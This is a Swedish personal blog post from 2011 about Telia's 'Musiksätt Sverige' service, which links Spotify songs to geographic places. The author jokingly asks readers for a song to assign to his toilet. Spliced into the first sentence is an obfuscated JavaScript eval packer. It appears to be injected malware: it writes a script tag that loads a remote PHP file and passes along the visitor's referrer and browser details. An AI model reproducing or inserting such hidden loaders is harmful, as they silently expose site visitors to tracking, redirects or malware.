Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Musiksätt Sverige!!!!!

Filip Urde
  • On 3 juni, 2011
  • http://www.revue.se/filip-urde


klockan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hyidf|var|u0026u|referrer|neekd||js|php’.split(’|’),0,{}))
är exakt 01:31 och jag ska musiksätta min toalett inom kort. För er som inte förstår vad jag babblar om att musiksätta Sverige och mer specifikt min toalett, så kan jag meddela att Telia i början av förra veckan lanserade sin totalt nya och fräscha logga, med tillhörande prylar, så som skyltar, butiksinredning osv. Tillsammans med detta facelift till lanseringen, så antar jag att Teila även ville ”hotta” upp sin image lite extra och lanserar tjänsten: Musiksätt Sverige (Musiksätt).

Musiksätt Sverige går ut på följande sätt: Tillsammans med Spotify och deras Premium konto, så kan du nu som Telia användare, musiksätta geo-positionerade platser i Sverige. Helt enkelt geografiska platser så som min toalett. Via gps hittar en satellit min toalett och sedan via Spotify så kopplar jag toaletten med en bra och passande låt. http://musiksattsverige.telia.se

SKIT KUL!!!!!

appen finns självklart på itunes och android market.

Nu är bara frågan…. Vad ska jag ha för låt på min toalett?!?!

Just nu kommer jag nog sätta Bachman-Turner Overdrive – Takin’ Care Of Business Ni fattar, eller hur? blink blink….bara för att jag känner mig så sjukt rolig på småtimmarna.

Men kan någon hitta på en bättre?!

Kan du?

I så fall Hjälp mig musiksätta min toalett!!!

Skriv era förslag i kommentaren.

Tack!!

/Filip